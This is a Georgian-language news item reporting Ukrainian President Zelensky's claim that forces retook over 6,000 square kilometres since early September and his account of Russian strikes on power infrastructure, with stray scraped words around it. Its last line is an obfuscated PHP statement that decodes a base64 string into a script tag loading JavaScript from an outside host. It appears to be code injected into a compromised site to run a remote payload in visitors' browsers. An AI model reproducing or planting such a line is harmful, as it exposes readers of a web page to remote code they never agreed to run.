celsiusi
ავერსი საქკაბელი
უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი აცხადებს, რომ სექტემბრის დასაწყისიდან უკრაინის შეიარაღებულმა ძალებმა რუსი ოკუპანტებისგან 6 000 კვადრატულ კილომეტრზე მეტი ტერიტორია გაათავისუფლეს. ამის შესახებ ზელენსკიმ ყოველდღიურ ვიდეომიმართვაში განაცხადა.
 
მისი თქმით, უკრაინის ძალების წინსვლა გრძელდება. ზელენსკიმ მადლობა გადაუხადა უკრაინის შეიარაღებული ძალების დანაყოფებს შესრულებული სამუშაოსთვის და მათ ნამდვილი გმირები უწოდა.
 
„სექტემბრის პირველი რიცხვებიდან და დღეს ჩვენმა მეომრებმა უკვე გაათავისუფლეს უკრაინის ტერიტორიის 6 000 კვადრატულ კილომეტრზე მეტი – აღმოსავლეთით და სამხრეთით. ჩვენი ჯარების წინსვლა გრძელდება“, – განაცხადა ზელენსკიმ.
 
უკრაინის ლიდერის თქმით, ბოლო ორი დღის განმავლობაში რუსეთმა დაბომბა უკრაინის ენერგეტიკული ინფრასტრუქტურა, რის გამოც ასობით ათასი უკრაინელი ელექტროენერგიის გარეშე დარჩა. დაიბომბა ის ობიექტები, რომლებსაც არანაირი კავშირი არ ჰქონდა სამხედრო ინფრასტრუქტურასთან.
 
„ერთი მხრივ, ეს არის მათი სასოწარკვეთის ნიშანი, ვინც მოიგონა ეს ომი. ისინი ასე რეაგირებენ ხარკოვის ოლქში რუსეთის ძალების განადგურებაზე. ისინი ვერაფერს უშვებიან ჩვენს გმირებს ბრძოლის ველზე და ამიტომ რუსეთი თავის მხდალ დარტყმებს სამოქალაქო ინფრასტრუქტურის წინააღმდეგ წარმართავს. მეორე მხრივ, რუსეთი ცდილობს, ხელი შეგვიშალოს, რომ უკრაინის შესაძლებლობები ევროპაში სიტუაციის სტაბილიზაციისთვის გამოვიყენოთ. ელექტროენერგიის ჩვენი ექსპორტი არის ის, რისიც რუსეთს ახლა ძალიან ეშინია, რადგან ჩვენ შეგვიძლია, ჩავშალოთ რუსეთის გეგმები ამ ზამთარს გიჟური ენერგეტიკული ფასების გამო ევროპელების ჯიბის გამოსუფთავებასთან დაკავშირებით“, – განაცხადა უკრაინის პრეზიდენტმა.
406
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");